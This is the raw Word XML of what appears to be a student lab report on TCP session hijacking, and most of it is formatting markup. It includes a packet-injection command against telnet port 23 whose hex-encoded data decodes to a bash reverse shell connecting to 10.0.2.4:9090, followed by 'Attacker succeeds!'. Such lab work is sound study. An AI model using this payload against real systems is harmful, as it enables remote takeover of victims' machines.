        <w:t>tcp-src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00873DA1">
        <w:t xml:space="preserve"> 49284 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00873DA1">
        <w:t>tcp-dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00873DA1">
        <w:t xml:space="preserve"> 23 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00873DA1">
        <w:t>tcp-seqnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00873DA1">
        <w:t xml:space="preserve"> 2625836405 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00873DA1">
        <w:t>tcp-acknum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00873DA1">
        <w:t xml:space="preserve"> 3455673781 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00873DA1">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00873DA1">
        <w:t>-ack --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00873DA1">
        <w:t>tcp-psh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00873DA1">
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00873DA1">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00873DA1">
        <w:t>-window 501 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00873DA1">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00873DA1">
        <w:t>-data '0d202f62696e2f62617368202d69203e202f6465762f7463702f31302e302e322e342f3930393020303c263120323e2631200d' --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00873DA1">
        <w:t>spoofip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00873DA1">
        <w:t xml:space="preserve"> "best"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AC87C3" w14:textId="1CAB1A56" w:rsidR="00322C66" w:rsidRDefault="00322C66" w:rsidP="00C550FB"/>
    <w:p w14:paraId="6B1E0472" w14:textId="4A0D58BA" w:rsidR="003103A8" w:rsidRDefault="003103A8" w:rsidP="00C550FB">
      <w:r>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E97AE5D" w14:textId="6A2CE3CD" w:rsidR="00873DA1" w:rsidRDefault="00873DA1" w:rsidP="00C550FB">
      <w:r>
        <w:t>Attacker succeeds! Here we can see that the read/write and error is redirected into the socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572C1AD9" w14:textId="1CC72F67" w:rsidR="00873DA1" w:rsidRDefault="00873DA1" w:rsidP="00C550FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2072360C" wp14:editId="41DB2646">
            <wp:extent cx="4678878" cy="3870566"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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3779" cy="3882893"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13445426" w14:textId="77777777" w:rsidR="00873DA1" w:rsidRDefault="00873DA1" w:rsidP="00C550FB"/>
    <w:p w14:paraId="7E7E37CA" w14:textId="77777777" w:rsidR="00901A38" w:rsidRPr="006B1D6F" w:rsidRDefault="00C550FB" w:rsidP="00C550FB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>2. Use screenshots to show you can run commands on the victim machine (15 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2F2AB5" w14:textId="18F597BD" w:rsidR="00901A38" w:rsidRDefault="003103A8" w:rsidP="00901A38">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5EAF3936" wp14:editId="4379210C">
            <wp:simplePos x="463138" y="831273"/>
            <wp:positionH relativeFrom="column">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="6504353" cy="6547856"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>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04353" cy="6547856"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7530C684" w14:textId="6B3CB674" w:rsidR="00755471" w:rsidRDefault="00755471" w:rsidP="00901A38">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B1E94F4" w14:textId="3F4534ED" w:rsidR="00755471" w:rsidRDefault="00755471" w:rsidP="00901A38">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D0C2B3B" w14:textId="36E36D0C" w:rsidR="00755471" w:rsidRDefault="00755471" w:rsidP="00901A38">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DDB2D71" w14:textId="6C6B17D9" w:rsidR="00755471" w:rsidRDefault="00755471" w:rsidP="00901A38">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="637ECAD4" w14:textId="12380F8B" w:rsidR="00755471" w:rsidRDefault="00755471" w:rsidP="00901A38">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BB909E3" w14:textId="54BCFA64" w:rsidR="00755471" w:rsidRDefault="00755471" w:rsidP="00901A38">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70DEBF9E" w14:textId="2C6A02D1" w:rsidR="00755471" w:rsidRDefault="00755471" w:rsidP="00901A38">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79FACD7C" w14:textId="25AA0BC7" w:rsidR="00755471" w:rsidRDefault="00755471" w:rsidP="00901A38">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0792A358" w14:textId="1F91167A" w:rsidR="00755471" w:rsidRDefault="00755471" w:rsidP="00901A38">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C17FFF1" w14:textId="5FC28E2D" w:rsidR="00755471" w:rsidRDefault="00755471" w:rsidP="00901A38">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ADBF86F" w14:textId="77777777" w:rsidR="008F6D76" w:rsidRPr="00901A38" w:rsidRDefault="00290AB9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="008F6D76" w:rsidRPr="00901A38" w:rsidSect="0058607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957BF0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7390CF2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1F16C66"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="038687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46D551B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F46EAD90"/>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8DA342F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4B660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ADA7E62"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9538F12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A38"/>
    <w:rsid w:val="00026338"/>
    <w:rsid w:val="00032ACA"/>
    <w:rsid w:val="00041F28"/>
    <w:rsid w:val="000B5D58"/>
    <w:rsid w:val="000C558F"/>
    <w:rsid w:val="000E2258"/>
    <w:rsid w:val="000F6AD3"/>
    <w:rsid w:val="001144BB"/>
    <w:rsid w:val="00132BD0"/>
    <w:rsid w:val="0015263C"/>
    <w:rsid w:val="001C1B7F"/>
    <w:rsid w:val="001C3182"/>
    <w:rsid w:val="001C388A"/>
    <w:rsid w:val="00265C35"/>
    <w:rsid w:val="00290AB9"/>
    <w:rsid w:val="002F1E87"/>
    <w:rsid w:val="002F420E"/>
    <w:rsid w:val="003103A8"/>
    <w:rsid w:val="00322C66"/>
    <w:rsid w:val="00355BAB"/>
    <w:rsid w:val="003E444D"/>
    <w:rsid w:val="00424C3B"/>
    <w:rsid w:val="004473B2"/>
    <w:rsid w:val="00455111"/>
    <w:rsid w:val="00505F46"/>
    <w:rsid w:val="00515407"/>
    <w:rsid w:val="005220BE"/>
    <w:rsid w:val="00586072"/>
    <w:rsid w:val="005A56B2"/>
    <w:rsid w:val="005B0C65"/>
    <w:rsid w:val="005B4850"/>
    <w:rsid w:val="005F6380"/>
    <w:rsid w:val="006360CA"/>
    <w:rsid w:val="006574EC"/>
    <w:rsid w:val="00683F7F"/>
    <w:rsid w:val="006B1D6F"/>
    <w:rsid w:val="006D646D"/>
    <w:rsid w:val="007006A9"/>
    <w:rsid w:val="007042F2"/>
    <w:rsid w:val="007207E8"/>
    <w:rsid w:val="00730E4C"/>
    <w:rsid w:val="0074657B"/>
    <w:rsid w:val="0075217A"/>
    <w:rsid w:val="00755471"/>
    <w:rsid w:val="00757FAD"/>
    <w:rsid w:val="00775B95"/>
    <w:rsid w:val="0079219A"/>
    <w:rsid w:val="007A14D4"/>
    <w:rsid w:val="007A6D49"/>
    <w:rsid w:val="007A78EE"/>
    <w:rsid w:val="00873DA1"/>
    <w:rsid w:val="00901A38"/>
    <w:rsid w:val="009511C3"/>
    <w:rsid w:val="00966A03"/>
    <w:rsid w:val="009B75DF"/>
    <w:rsid w:val="00A67545"/>
    <w:rsid w:val="00AB3761"/>
    <w:rsid w:val="00AE0E15"/>
    <w:rsid w:val="00B410C2"/>
    <w:rsid w:val="00B63B7A"/>
    <w:rsid w:val="00B64665"/>
    <w:rsid w:val="00C550FB"/>
    <w:rsid w:val="00D33A7F"/>
    <w:rsid w:val="00E603F4"/>
    <w:rsid w:val="00F50467"/>
    <w:rsid w:val="00F62E60"/>
    <w:rsid w:val="00F807F2"/>
    <w:rsid w:val="00F91CF5"/>
    <w:rsid w:val="00FD28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BEA6E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C836C5EA-2F43-B34A-8017-F6DC09B82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1A3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1A38"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0075217A"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0075217A"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00132BD0"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00132BD0"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00132BD0"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00132BD0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00132BD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835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en.wikipedia.org/wiki/Address_Resolution_Protoco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22</Pages>
  <Words>2270</Words>
  <Characters>12942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Nandar SOE</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nandar SOE</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-09-05T07:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-10T13:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>